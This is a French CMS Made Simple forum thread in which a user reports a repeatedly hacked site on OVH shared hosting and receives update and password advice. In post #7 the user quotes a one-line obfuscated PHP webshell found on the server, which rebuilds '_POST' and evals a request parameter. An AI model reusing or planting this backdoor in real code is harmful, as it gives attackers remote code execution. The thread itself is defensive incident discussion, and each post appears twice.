Site piraté, des infos ?

Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: !1.11.6
#~ Url du site :
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

j'ai un site qui est piraté, plusieurs fois depuis la semaine dernière. OVH l'hébergeur, ferme brutalement le site et supprime automatiquement le fichier suspect. Je rétablis le site manuellement ensuite. J'ai changé les mots de passe du FTP, de la BDD et du serveur mail.

Pour l'histoire, j'ai un CMSMS 1.11.6 que j'ai voulu mettre à jour en octobre dernier avec la 1.11.11. J'ai tout sauvegardé, chargé les fichiers par FTP comme d'habitude et... page blanche avec un message d'erreur qui m'indiquait qu"il ne trouvait pas la BDD (désolée, je n'ai plus le message exact...).
Bref j'aurais dû signalé le problème aussitôt sur ce forum, mais j'ai vu que la V2 était en cours et je me suis que je n'aurais pas longtemps à attendre et que je ferais la mise à jour directement vers la V2, mais....

Dommage, le site a été piraté avant.

Bref, je voulais simplement savoir si vous aviez des infos, entendu qqchose sur des attaques visant CMSMS en ce moment ?

OVH bloque un fichier qui essaie de supprimer des fichiers (c'est ce qu'indique leur email d'alerte).
Et sur le serveur, j'ai supprimé par FTP plein de fichiers PHP suspects, qui n'avaient rien à voir avec l'install de CMSMS (j'ai comparé avec la sauvegarde d'octobre dernier). J'en déduis que ces fichiers PHP avaient été créé par les pirates.

Si vous avez des infos, je suis preneuse, si vous n'avez pas connaissance d'autres attaques de ce type, merci de me le dire aussi, ça me permettra d'éliminer des pistes, surtout que je n'ai pas l'habitude d'analyser des problèmes de piratage :-(

Merci pour votre aide
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: !1.11.6
#~ Url du site :
#~ Hébergeur / Soft : OVH
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

j'ai un site qui est piraté, plusieurs fois depuis la semaine dernière. OVH l'hébergeur, ferme brutalement le site et supprime automatiquement le fichier suspect. Je rétablis le site manuellement ensuite. J'ai changé les mots de passe du FTP, de la BDD et du serveur mail.

Pour l'histoire, j'ai un CMSMS 1.11.6 que j'ai voulu mettre à jour en octobre dernier avec la 1.11.11. J'ai tout sauvegardé, chargé les fichiers par FTP comme d'habitude et... page blanche avec un message d'erreur qui m'indiquait qu"il ne trouvait pas la BDD (désolée, je n'ai plus le message exact...).
Bref j'aurais dû signalé le problème aussitôt sur ce forum, mais j'ai vu que la V2 était en cours et je me suis que je n'aurais pas longtemps à attendre et que je ferais la mise à jour directement vers la V2, mais....

Dommage, le site a été piraté avant.

Bref, je voulais simplement savoir si vous aviez des infos, entendu qqchose sur des attaques visant CMSMS en ce moment ?

OVH bloque un fichier qui essaie de supprimer des fichiers (c'est ce qu'indique leur email d'alerte).
Et sur le serveur, j'ai supprimé par FTP plein de fichiers PHP suspects, qui n'avaient rien à voir avec l'install de CMSMS (j'ai comparé avec la sauvegarde d'octobre dernier). J'en déduis que ces fichiers PHP avaient été créé par les pirates.

Si vous avez des infos, je suis preneuse, si vous n'avez pas connaissance d'autres attaques de ce type, merci de me le dire aussi, ça me permettra d'éliminer des pistes, surtout que je n'ai pas l'habitude d'analyser des problèmes de piratage :-(

Merci pour votre aide
#2
Bonjour,
à ma connaissance, pas d'attaques spécifiques sur CMSMS, difficile de savoir par où ils sont passés pour déposer des fichiers sur ton espace.
Je me suis fait pirater cet été sur un site à jour chez AMEN, après plusieurs heures de recherches, j'ai vu que mes colocataires du mutualisé étaient infectés eux aussi!
Bien sûr Amen ne se remet pas en cause!
Donc, ça me fait dire qu'on peut toujours chercher d'où cela peut venir mais une chose est sûr : si l'hébergeur ne t'accuse pas, c'est qu'il sait que ça ne vient pas de toi!

Tu as donc bien fait de changer tous tes mots de passe.
Je te conseille quand même de faire la mise à jour vers la dernière version en local et de mettre en ligne.
Si tu as des problèmes pendant ces manipulations, il faudra revenir ouvrir un post ici!
{SEO}
Inscrivez-vous à notre Newsletter sur le site (colonne de droite, en bas).
Vous appréciez CMSMS et l'aide qui vous est fournie ici, aidez-nous en participant au projet.
Formation CMS Made Simple | Création de site CMS Made Simple.

C'est en se plantant qu'on devient cultivé.
J'ai un string dans l'Array (Paris Hilton)
#2
Bonjour,
à ma connaissance, pas d'attaques spécifiques sur CMSMS, difficile de savoir par où ils sont passés pour déposer des fichiers sur ton espace.
Je me suis fait pirater cet été sur un site à jour chez AMEN, après plusieurs heures de recherches, j'ai vu que mes colocataires du mutualisé étaient infectés eux aussi!
Bien sûr Amen ne se remet pas en cause!
Donc, ça me fait dire qu'on peut toujours chercher d'où cela peut venir mais une chose est sûr : si l'hébergeur ne t'accuse pas, c'est qu'il sait que ça ne vient pas de toi!

Tu as donc bien fait de changer tous tes mots de passe.
Je te conseille quand même de faire la mise à jour vers la dernière version en local et de mettre en ligne.
Si tu as des problèmes pendant ces manipulations, il faudra revenir ouvrir un post ici!
{SEO}
Inscrivez-vous à notre Newsletter sur le site (colonne de droite, en bas).
Vous appréciez CMSMS et l'aide qui vous est fournie ici, aidez-nous en participant au projet.
Formation CMS Made Simple | Création de site CMS Made Simple.

C'est en se plantant qu'on devient cultivé.
J'ai un string dans l'Array (Paris Hilton)
#3
Fais une recherche sur le nom des fichiers ajoutés par le pirate, tu en sauras plus car il est certain qu'il n'y a pas que toi d'infecté.
#3
Fais une recherche sur le nom des fichiers ajoutés par le pirate, tu en sauras plus car il est certain qu'il n'y a pas que toi d'infecté.
#4
si tu étais en 11.6 il y a eu de mises à jour de sécurité au moins en 11.7 et 11.10.
Il faut mettre à jour impérativement en 1.11.12 avant de ré ouvrir le site Web au public
J-C Etiemble v 2.2.xx
#4
si tu étais en 11.6 il y a eu de mises à jour de sécurité au moins en 11.7 et 11.10.
Il faut mettre à jour impérativement en 1.11.12 avant de ré ouvrir le site Web au public
J-C Etiemble v 2.2.xx
#5
Je viens de faire la mise à jour vers la 1.11.11
j'ai mis à jour les modules (sauf CGExtensions qui reste en 1.42.2, le lien "mise à jour" ne fonctionne pas)(je vais ouvrir un autre post à ce sujet).
Et j'ai rechangé les mots de passe

Et je viens de recevoir un mail d'OVH qui m'indique qu'une nouvelle attaque vient d'avoir lieu !
Notre système de surveillance (Okillerd) a détecté une opération irrégulière au niveau de votre site.

Les détails de cette opération sont les suivants :

mutuelle-gendarmerie.fr

Problème rencontré : Executing deleted program
Commande apparente : ././ps
Exécutable utilisé : /homez.395/mutuellea/www/lib/smarty/plugins/.nfs000000000bc3f00a000039c8
Horodatage: 2015-01-13 19:30:08


Ceci n'est pas autorisé sur nos installations,
car c'est une tentative potentielle de piratage.
----

Je suis allé voir le répertoire en question et il n'y a même plus de répertoire "Plugins" dans Smarty :|
OVH l'aurait supprimé ?
En comparant avec ma sauvegarde d'octobre dernier, il manquerait même plein de répertoires dans "smarty"....

Je vais donc me tourner vers OVH si vous me dites qu'il n'y a pas de pb particulier sur CMSMS.

Merci de vos réponses
#5
Je viens de faire la mise à jour vers la 1.11.11
j'ai mis à jour les modules (sauf CGExtensions qui reste en 1.42.2, le lien "mise à jour" ne fonctionne pas)(je vais ouvrir un autre post à ce sujet).
Et j'ai rechangé les mots de passe

Et je viens de recevoir un mail d'OVH qui m'indique qu'une nouvelle attaque vient d'avoir lieu !
Notre système de surveillance (Okillerd) a détecté une opération irrégulière au niveau de votre site.

Les détails de cette opération sont les suivants :

mutuelle-gendarmerie.fr

Problème rencontré : Executing deleted program
Commande apparente : ././ps
Exécutable utilisé : /homez.395/mutuellea/www/lib/smarty/plugins/.nfs000000000bc3f00a000039c8
Horodatage: 2015-01-13 19:30:08


Ceci n'est pas autorisé sur nos installations,
car c'est une tentative potentielle de piratage.
----

Je suis allé voir le répertoire en question et il n'y a même plus de répertoire "Plugins" dans Smarty :|
OVH l'aurait supprimé ?
En comparant avec ma sauvegarde d'octobre dernier, il manquerait même plein de répertoires dans "smarty"....

Je vais donc me tourner vers OVH si vous me dites qu'il n'y a pas de pb particulier sur CMSMS.

Merci de vos réponses
#6
1- ce n'est pas 1.11.11 mais --> mettre à jour impérativement en 1.11.12

2 il n'y a rien de signaler sur CMsms sinon ça se saurait Wink

3 sécurise les dossiers et met le fichier modifFile.php de jean pour vérifier tes fichiers

4 change tous tes mots de passe
J-C Etiemble v 2.2.xx
#6
1- ce n'est pas 1.11.11 mais --> mettre à jour impérativement en 1.11.12

2 il n'y a rien de signaler sur CMsms sinon ça se saurait Wink

3 sécurise les dossiers et met le fichier modifFile.php de jean pour vérifier tes fichiers

4 change tous tes mots de passe
J-C Etiemble v 2.2.xx
#7
Je viens de regarder les fichiers PHP que j'avais récupéré, ils sont nommés : blog.php, proxy.php ou sql.php, il y en avait d'autres avec des noms très banals aussi.

Un ex du code contenu dans ces fichiers :
[ins]<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q7f69dd'])){eval(${$s20}['q7f69dd']);}?>[/ins]

en faisant une recherche sur ces fichiers, j'ai trouvé cet article qui, je trouve, illustre très bien ce qui vient d'arriver à mon site.

Ce n'est pas très rassurant car il n'y a apparemment pas vraiment de solutions une fois qu'on est infecté. A part la mise à jour que je viens de faire, l'auteur de l'article conseille de décortiquer la BDD, un travail de fourmi !!!

J'ai aussi mis en place tous les conseils de sécurité évoqués ici

bref cet épisode m'aura servi de leçon quant à la sécurité des sites.

Depuis le temps que j'utilise CMSMS, j'en suis toujours satisfaite, vivement la V2 !
#7
Je viens de regarder les fichiers PHP que j'avais récupéré, ils sont nommés : blog.php, proxy.php ou sql.php, il y en avait d'autres avec des noms très banals aussi.

Un ex du code contenu dans ces fichiers :
[ins]<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q7f69dd'])){eval(${$s20}['q7f69dd']);}?>[/ins]

en faisant une recherche sur ces fichiers, j'ai trouvé cet article qui, je trouve, illustre très bien ce qui vient d'arriver à mon site.

Ce n'est pas très rassurant car il n'y a apparemment pas vraiment de solutions une fois qu'on est infecté. A part la mise à jour que je viens de faire, l'auteur de l'article conseille de décortiquer la BDD, un travail de fourmi !!!

J'ai aussi mis en place tous les conseils de sécurité évoqués ici

bref cet épisode m'aura servi de leçon quant à la sécurité des sites.

Depuis le temps que j'utilise CMSMS, j'en suis toujours satisfaite, vivement la V2 !
#8
>en faisant une recherche sur ces fichiers, j'ai trouvé cet article
cela veut-il dire que sur ton hébergement il y autre chose que CMSms ?
J-C Etiemble v 2.2.xx
#8
>en faisant une recherche sur ces fichiers, j'ai trouvé cet article
cela veut-il dire que sur ton hébergement il y autre chose que CMSms ?
J-C Etiemble v 2.2.xx
#9
c'est un hébergement mutualisé chez OVH, donc je ne sais pas ce qu'il y a à côté.
Je citais l'article car l'attaque qui est décrite correspond à peu près à ce que j'ai trouvé sur mon site.
#9
c'est un hébergement mutualisé chez OVH, donc je ne sais pas ce qu'il y a à côté.
Je citais l'article car l'attaque qui est décrite correspond à peu près à ce que j'ai trouvé sur mon site.
#10
heu... mais question était sur "ton hébergement" a toi pas celle du serveur
- autre chose que CMSms ?
et aussi quel modules étaient installés
si faille il y a, il est interposant de savoir comment et où elle à pu se produire soit sur "ton hébergement" ou .... .

Comme l'article cite des attaques uniquement sur wordpress :/
J-C Etiemble v 2.2.xx
#10
heu... mais question était sur "ton hébergement" a toi pas celle du serveur
- autre chose que CMSms ?
et aussi quel modules étaient installés
si faille il y a, il est interposant de savoir comment et où elle à pu se produire soit sur "ton hébergement" ou .... .

Comme l'article cite des attaques uniquement sur wordpress :/
J-C Etiemble v 2.2.xx


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)